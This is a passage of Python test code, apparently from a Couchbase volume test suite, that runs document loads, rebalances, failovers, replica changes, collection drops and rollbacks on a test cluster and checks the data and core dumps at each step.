def check_warmup_complete(self, server):
for bucket in self.cluster.buckets:
start_time = time.time()
result = self.bucket_util._wait_warmup_completed(
[server],
self.cluster.buckets[0],
wait_time=self.wait_timeout * 20)
if not result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertTrue(result, "Warm-up failed in %s seconds"
% (self.wait_timeout * 20))
else:
self.log.info("Bucket:%s warm-up completed in %s." %
(bucket.name, str(time.time() - start_time)))
def perform_rollback(self, start=None, mem_only_items=100000,
doc_type="create", kill_rollback=1):
if not self.rollback:
return
rollbacks = self.input.param("rollbacks", 2)
# mem_only_items = random.randint(mem_only_items, mem_only_items*2)
_iter = 0
self.gen_create, self.gen_update, self.gen_delete, self.gen_expiry = [None]*4
while _iter < rollbacks:
self.PrintStep("Rollback with %s: %s" % (doc_type,
str(_iter)))
tasks_info = dict()
node = self.cluster.nodes_in_cluster[0]
# Stopping persistence on NodeA
mem_client = MemcachedClientHelper.direct_client(
node, self.cluster.buckets[0])
mem_client.stop_persistence()
shell = RemoteMachineShellConnection(node)
cbstats = Cbstats(shell)
target_vbucket = cbstats.vbucket_list(self.cluster.buckets[0].
name)
shell.disconnect()
gen_docs = doc_generator(
self.key_prefix,
start, mem_only_items,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=target_vbucket,
vbuckets=self.cluster.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size)
if doc_type == "create":
self.gen_create = gen_docs
if doc_type == "update":
self.gen_update = gen_docs
if doc_type == "delete":
self.gen_delete = gen_docs
if doc_type == "expiry":
self.gen_expiry = gen_docs
if self.maxttl == 0:
self.maxttl = self.input.param("maxttl", 10)
doc_type = "update"
task = self.perform_load(wait_for_load=False)
self.wait_for_doc_load_completion(task, wait_for_stats=False)
ep_queue_size_map = {node: mem_only_items *
self.num_scopes *
self.num_collections}
vb_replica_queue_size_map = {node: 0}
for server in self.cluster.nodes_in_cluster:
if server.ip != node.ip:
ep_queue_size_map.update({server: 0})
vb_replica_queue_size_map.update({server: 0})
for bucket in self.cluster.buckets:
self.bucket_util._wait_for_stat(bucket, ep_queue_size_map,
timeout=3600)
self.bucket_util._wait_for_stat(
bucket,
vb_replica_queue_size_map,
stat_name="vb_replica_queue_size",
timeout=3600)
self.kill_memcached(num_kills=kill_rollback)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
self.print_stats()
_iter += 1
def pause_rebalance(self):
rest = RestConnection(self.cluster.master)
i = 1
self.sleep(10, "Let the rebalance begin!")
expected_progress = 20
while expected_progress < 100:
expected_progress = 20 * i
reached = RestHelper(rest).rebalance_reached(expected_progress)
self.assertTrue(reached, "Rebalance failed or did not reach {0}%"
.format(expected_progress))
if not RestHelper(rest).is_cluster_rebalanced():
self.log.info("Stop the rebalance")
stopped = rest.stop_rebalance(wait_timeout=self.wait_timeout / 3)
self.assertTrue(stopped, msg="Unable to stop rebalance")
rebalance_task = self.task.async_rebalance(self.cluster.nodes_in_cluster,
[], [],
retry_get_process_num=3000)
self.sleep(10, "Rebalance % ={}. Let the rebalance begin!".
format(expected_progress))
i += 1
return rebalance_task
def abort_rebalance(self, rebalance, error_type="kill_memcached"):
self.sleep(30, "Let the rebalance begin!")
rest = RestConnection(self.cluster.master)
i = 1
expected_progress = 20
rebalance_task = rebalance
while expected_progress < 80:
expected_progress = 20 * i
reached = RestHelper(rest).rebalance_reached(expected_progress,
wait_step=10)
self.assertTrue(reached, "Rebalance failed or did not reach {0}%"
.format(expected_progress))
if not RestHelper(rest).is_cluster_rebalanced():
self.log.info("Abort rebalance")
self._induce_error(error_type)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
self.sleep(60, "Sleep after error introduction")
self._recover_from_error(error_type)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
try:
self.task.jython_task_manager.get_task_result(rebalance_task)
except RebalanceFailedException:
pass
if rebalance.result:
self.log.error("Rebalance passed/finished which is not expected")
self.log.info("Rebalance % after rebalance finished = {}".
format(expected_progress))
break
else:
self.log.info("Restarting Rebalance after killing at {}".
format(expected_progress))
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], self.servs_out,
retry_get_process_num=3000)
self.sleep(120, "Let the rebalance begin after abort")
self.log.info("Rebalance % = {}".
format(self.rest._rebalance_progress()))
i += 1
return rebalance_task
def PrintStep(self, msg=None):
print("\n")
print("#"*60)
print("#")
print("# %s" % msg)
print("#")
print("#"*60)
print("\n")
def ClusterOpsVolume(self):
#######################################################################
def end_step_checks(tasks):
self.wait_for_doc_load_completion(tasks)
self.data_validation()
self.print_stats()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
self.loop = 0
while self.loop < self.iterations:
'''
Create sequential: 0 - 10M
Final Docs = 10M (0-10M, 10M seq items)
'''
self.create_perc = 100
self.PrintStep("Step 3: Create %s items sequentially" % self.num_items)
self.generate_docs(doc_ops=["create"],
create_start=self.start, create_end=self.num_items)
self.perform_load(validate_data=False)
self.PrintStep("Step 3.1: Update %s RandonKey keys to create 50 percent fragmentation" % str(self.num_items))
self.generate_docs(doc_ops=["update"],
update_start=self.start, update_end=self.end)
self.perform_load(validate_data=False)
###################################################################
'''
Existing:
Sequential: 0 - 10M
This Step:
Create Random: 0 - 20M
Final Docs = 30M (0-20M, 20M Random)
Nodes In Cluster = 3
'''
self.PrintStep("Step 4: Create %s random keys" % str(self.num_items))
self.generate_docs(doc_ops=["create"],
create_start=self.end, create_end=self.end+self.num_items)
self.perform_load(validate_data=False)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 20M
This Step:
Update Sequential: 0 - 10M
Update Random: 0 - 20M to create 50% fragmentation
Final Docs = 30M (0-20M, 20M Random)
Nodes In Cluster = 3
'''
self.update_perc = 100
self.PrintStep("Step 5: Update %s random keys to create 50 percent fragmentation" % str(self.num_items))
self.generate_docs(doc_ops=["update"],
update_start=self.start, update_end=self.end)
self.perform_load(validate_data=False)
self.mutation_perc = self.input.param("mutation_perc", 100)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 20M
This Step:
Create Random: 20 - 30M
Delete Random: 10 - 20M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 4
Final Docs = 30M (Random: 0-10M, 20-30M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.create_perc = 25
self.update_perc = 25
self.delete_perc = 25
self.expiry_perc = 25
self.read_perc = 25
self.PrintStep("Step 6: Rebalance in with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 20 - 30M
This Step:
Create Random: 30 - 40M
Delete Random: 20 - 30M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 3
Final Docs = 30M (Random: 0-10M, 30-40M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 7: Rebalance Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=0, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 30 - 40M
This Step:
Create Random: 40 - 50M
Delete Random: 30 - 40M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 4
Final Docs = 30M (Random: 0-10M, 40-50M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.PrintStep("Step 8: Rebalance In_Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=2, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 40 - 50M
This Step:
Create Random: 50 - 60M
Delete Random: 40 - 50M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 4 (SWAP)
Final Docs = 30M (Random: 0-10M, 50-60M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.PrintStep("Step 9: Swap with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 50 - 60M
This Step:
Create Random: 60 - 70M
Delete Random: 50 - 60M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 3
Final Docs = 30M (Random: 0-10M, 60-70M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 10: Failover a node and RebalanceOut that node \
with loading in parallel")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster, self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.assertTrue(self.rest.monitorRebalance(), msg="Failover -> Rebalance failed")
self.nodes = self.rest.node_statuses()
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
self.rest.rebalance(otpNodes=[node.id for node in self.nodes],
ejectedNodes=[self.chosen[0].id])
self.assertTrue(self.rest.monitorRebalance(), msg="Rebalance failed")
servs_out = [node for node in self.cluster.servers
if node.ip == self.chosen[0].ip]
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.available_servers += servs_out
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.servers[:self.nodes_in + self.nodes_init],
self.cluster.buckets, path=None)
nodes = self.cluster_util.get_nodes_in_cluster(self.cluster)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=nodes, buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 60 - 70M
This Step:
Create Random: 70 - 80M
Delete Random: 60 - 70M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 3
Final Docs = 30M (Random: 0-10M, 70-80M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 11: Failover a node and FullRecovery\
that node")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster,
self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(60, "Waiting for failover to finish and settle down cluster.")
self.assertTrue(self.rest.monitorRebalance(), msg="Failover -> Rebalance failed")
# Mark Node for full recovery
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="full")
self.sleep(60, "Waiting for full recovery to finish and settle down cluster.")
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.nodes_in_cluster,
self.cluster.buckets, path=None)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=self.cluster.nodes_in_cluster,
buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 70 - 80M
This Step:
Create Random: 80 - 90M
Delete Random: 70 - 80M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 3
Final Docs = 30M (Random: 0-10M, 80-90M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 12: Failover a node and DeltaRecovery that \
node with loading in parallel")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster,
self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(60, "Waiting for failover to finish and settle down cluster.")
self.rest.monitorRebalance()
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="delta")
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
self.sleep(60, "Waiting for delta recovery to finish and settle down cluster.")
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
self.set_num_writer_and_reader_threads(
num_writer_threads="disk_io_optimized",
num_reader_threads="disk_io_optimized")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.nodes_in_cluster,
self.cluster.buckets, path=None)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=self.cluster.nodes_in_cluster,
buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 80 - 90M
This Step:
Create Random: 90 - 100M
Delete Random: 80 - 90M
Update Random: 0 - 10M
Replica 1 - > 2
Final Docs = 30M (Random: 0-10M, 90-100M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 13: Updating the bucket replica to 2")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=2)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
tasks_info = self.data_load()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
####################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 90 - 100M
This Step:
Create Random: 100 - 110M
Delete Random: 90 - 100M
Update Random: 0 - 10M
Replica 2 - > 1
Final Docs = 30M (Random: 0-10M, 100-110M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 14: Updating the bucket replica to 1")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
rebalance_task = self.task.async_rebalance(self.cluster.nodes_in_cluster,
[], [],
retry_get_process_num=3000)
tasks_info = self.data_load()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
#######################################################################
self.PrintStep("Step 15: Flush the bucket and \
start the entire process again")
self.loop += 1
if self.loop < self.iterations:
# Flush the bucket
result = self.bucket_util.flush_all_buckets(self.cluster)
self.assertTrue(result, "Flush bucket failed!")
self.sleep(600)
if len(self.cluster.nodes_in_cluster) > self.nodes_init:
nodes_cluster = self.cluster.nodes_in_cluster[:]
nodes_cluster.remove(self.cluster.master)
servs_out = random.sample(
nodes_cluster,
int(len(self.cluster.nodes_in_cluster)
- self.nodes_init))
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], servs_out,
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(
rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.available_servers += servs_out
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
else:
self.log.info("Volume Test Run Complete")
self.init_doc_params()
def ReadHeavyWorkload(self):
#######################################################################
self.key_prefix = "random_keys"
self.loop = 1
self.skip_read_on_error = True
self.suppress_error_table = True
self.doc_ops = ["create"]
self.create_perc = 100
for bucket in self.cluster.buckets:
self.PrintStep("Step 1: Create %s items" % self.num_items)
self.generate_docs(doc_ops=self.doc_ops)
self.perform_load(validate_data=False)
dgm = self.get_bucket_dgm(bucket)
while self.dgm and dgm > self.dgm:
self.generate_docs(doc_ops=self.doc_ops)
dgm = self.get_bucket_dgm(bucket)
self.perform_load(validate_data=False)
self.doc_ops = ["read"]
self.read_perc = 100
self.generate_docs(doc_ops=self.doc_ops)
self.data_validation()
while self.loop <= self.iterations:
task = self.perform_load(wait_for_load=False, validate_data=False)
self.wait_for_doc_load_completion(task)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.PrintStep("CRASH | CRITICAL | WARN messages found in cb_logs")
if self.assert_crashes_on_load:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(result)
self.bucket_util.print_bucket_stats(self.cluster)
self.print_crud_stats()
for bucket in self.cluster.buckets:
self.get_bucket_dgm(bucket)
if bucket.storageBackend == Bucket.StorageBackend.magma:
self.get_magma_disk_usage(bucket)
def MB_43460(self):
self.loop = 1
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
creates: 0 - 10M
Final Docs = 20M (0-20M)
'''
self.create_perc = 200
self.PrintStep("Step 4: Load %s items, sequential keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create")
self.perform_load(validate_data=False)
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_scopes = self.num_scopes
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
drop += 1
self.num_collections = self.num_collections - drop
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.final_items = self.final_items * (self.num_collections)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(self.final_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
if self.end_step == 13:
exit(13)
#######################################################################
self.PrintStep("Step 14: Normal Rollback with deletes")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
mem_only_items = self.input.param("rollback_items", 100000)
self.perform_rollback(0, mem_only_items, doc_type="delete")
if self.end_step == 14:
exit(14)
def MB_42652(self):
self.loop = 1
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
creates: 0 - 10M
Final Docs = 20M (0-20M)
'''
self.key_type = self.input.param("key_type", "SimpleKey")
self.create_perc = 200
self.PrintStep("Step 4: Load %s items, sequential keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create",
create_start=0,
create_end=self.num_items)
self.perform_load(validate_data=False)
if self.end_step == 4:
exit(4)
'''
fragmentation at this time: 0, total data: 2X, stale: 0
'''
#######################################################################
'''
update: 0 - 1M * 10
Final Docs = 20M (0-20M)
'''
self.update_perc = 100
self.PrintStep("Step 5: Update the first set of %s percent (%s) items \
%s times" % (str(self.update_perc),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
_iter = 0
while _iter < self.step_iterations:
self.PrintStep("Step 5.%s: Update the first set of %s percent (%s) \
items %s times" % (str(_iter), str(self.update_perc),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
self.generate_docs(doc_ops="update")
self.perform_load(crash=False, validate_data=True)
_iter += 1
if self.end_step == 5:
exit(5)
'''
fragmentation at this time: 50, total data: 2X, stale: X
'''
#######################################################################
'''
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
temp = self.key_prefix
self.key_prefix = "random_keys"
self.key_type = "RandomKey"
self.create_perc = 100
self.PrintStep("Step 7: Create %s random keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create",
create_start=0,
create_end=self.num_items)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
'''
fragmentation: 50, total data: 3X, stale: X
'''
#######################################################################
'''
Update Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
_iter = 0
self.update_perc = 100
self.key_prefix = "random_keys"
self.PrintStep("Step 8: Update all %s random items %s times" %
(str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 8.%s: Update all %s random items %s times" %
(str(_iter),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
self.generate_docs(doc_ops="update",
update_start=self.start,
update_end=self.end*self.update_perc/100)
self.perform_load(crash=False, validate_data=True)
_iter += 1
self.key_prefix = temp
if self.end_step == 8:
exit(8)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_items = self.final_items
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
self.sleep(random.randint(1, 4))
drop += 1
if drop % (total_collections/4) == 0:
self.sleep(60, "Sleep after dropping half collections...")
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
total_items = self.final_items * (total_collections - drop)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(total_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
total_items,
timeout=3600)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
total_items = self.final_items * (total_collections - drop)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(total_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
total_items,
timeout=3600)
self.final_items = total_items
self.num_collections = self.num_collections - drop
if self.end_step == 13:
exit(13)
#######################################################################
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection})
self.num_collections += 1
self.sleep(0.5)
self.bucket_util.flush_all_buckets(self.cluster)
self.init_doc_params()
self.sleep(10, "Iteration %s completed successfully !!!" % self.loop)
self.loop += 1
if self.end_step == 18:
exit(18)
def SteadyStateVolume(self):
check_dump_th = threading.Thread(target=self.check_dump)
check_dump_th.start()
self.loop = 1
self.PrintStep("Step 3: Create %s items and checkout fragmentation" % str(self.num_items))
self.create_perc = 100
self.generate_docs(doc_ops=["create"],
create_start=0,
create_end=self.num_items)
self.perform_load(validate_data=False)
self.generate_docs(doc_ops=["create"],
create_start=self.end,
create_end=self.end+self.num_items)
self.perform_load(validate_data=False)
if self.end_step == 2:
exit(2)
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
deletes: 0 - 10M
Final Docs = 0
'''
self.PrintStep("Step 4: Starting parallel cruds")
self.create_perc, self.read_perc, self.update_perc, self.delete_perc = [100/len(self.doc_ops)]*4
self.generate_docs()
self.perform_load(validate_data=True)
if self.end_step == 3:
exit(3)
'''
fragmentation at this time: 0
'''
#######################################################################
'''
|----READ----|----UPDATE----|----DELETE----|----CREATE----|
25% 25% 25% 25%
Reverse Update: 10M - 9M
Final Docs = 20M (0-20M)
'''
_iter = 0
self.update_perc = 100
self.PrintStep("Step 6: Reverse Update last set of %s percent (%s-%s) \
items %s times" % (str(self.update_perc), str(self.num_items-1),
str(self.num_items+1 -
self.num_items),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 6.%s: Reverse Update last set of %s percent \
(%s-%s) items %s times" % (str(_iter), str(self.update_perc),
str(self.num_items+1),
str(self.num_items+1 -
self.num_items),
str(self.step_iterations)))
start = -self.update_end + 1
end = -self.update_start
self.generate_docs(doc_ops=["update"],
update_start=start,
update_end=end)
self.perform_load(crash=False, validate_data=True)
_iter += 1
if self.end_step == 6:
exit(6)
'''
fragmentation: 50, total data: 2X, stale: X
'''
#######################################################################
'''
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
temp = self.key_prefix
self.key_type = "RandomKey"
self.create_perc = 100
self.PrintStep("Step 7: Create %s random keys" % str(self.num_items))
self.generate_docs(doc_ops=["create"],
create_start=self.start,
create_end=self.start + self.num_items)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
'''
fragmentation: 50, total data: 3X, stale: X
'''
#######################################################################
'''
Update Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
_iter = 0
self.update_perc = 100
self.PrintStep("Step 8: Update all %s random items %s times" %
(str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 8.%s: Update all %s random items %s times" %
(str(_iter),
str(self.num_items),
str(self.step_iterations)))
self.generate_docs(doc_ops=["update"],
update_start=self.start,
update_end=self.end)
self.perform_load(crash=False, validate_data=True)
_iter += 1
self.key_prefix = temp
if self.end_step == 8:
exit(8)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
#######################################################################
'''
Delete Random: 0 - 10M
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
self.key_prefix = "random_keys"
self.delete_perc = 100
self.PrintStep("Step 9: Delete/Re-Create all %s random items" %
str(self.num_items))
self.generate_docs(doc_ops=["delete"],
delete_start=self.start,
delete_end=self.end)
self.perform_load(crash=False, validate_data=True)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
self.generate_docs(doc_ops=["create"],
create_start=self.start,
create_end=self.end)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
if self.end_step == 9:
exit(9)
#######################################################################
'''
Update: 0 - 1M
Final Docs = 30M (0-20M, 10M Random)
'''
self.create_perc, self.read_perc, self.update_perc, self.delete_perc = [100/len(self.doc_ops)]*4
self.PrintStep("Step 10: Update %s percent(%s) items %s times and \
crash during recovery" % (str(self.update_perc),
str(self.num_items),
str(self.step_iterations)))
_iter = 0
while _iter < self.step_iterations and self.crashes:
self.PrintStep("Step 10.%s: Update %s percent(%s) items %s times \
and crash during recovery" % (str(_iter), str(self.update_perc),
str(self.num_items),
str(self.step_iterations)))
self.generate_docs(doc_ops=self.doc_ops)
self.perform_load(crash=True, validate_data=False)
_iter += 1
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=1200)
if self.end_step == 10:
exit(10)
#######################################################################
self.PrintStep("Step 11: Normal Rollback with creates")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
mem_only_items = self.input.param("rollback_items", 100000)
self.perform_rollback(self.final_items, mem_only_items,
doc_type="create")
if self.end_step == 11:
exit(11)
#######################################################################
self.PrintStep("Step 12: Normal Rollback with updates")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="update")
if self.end_step == 12:
exit(12)
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_scopes = self.num_scopes
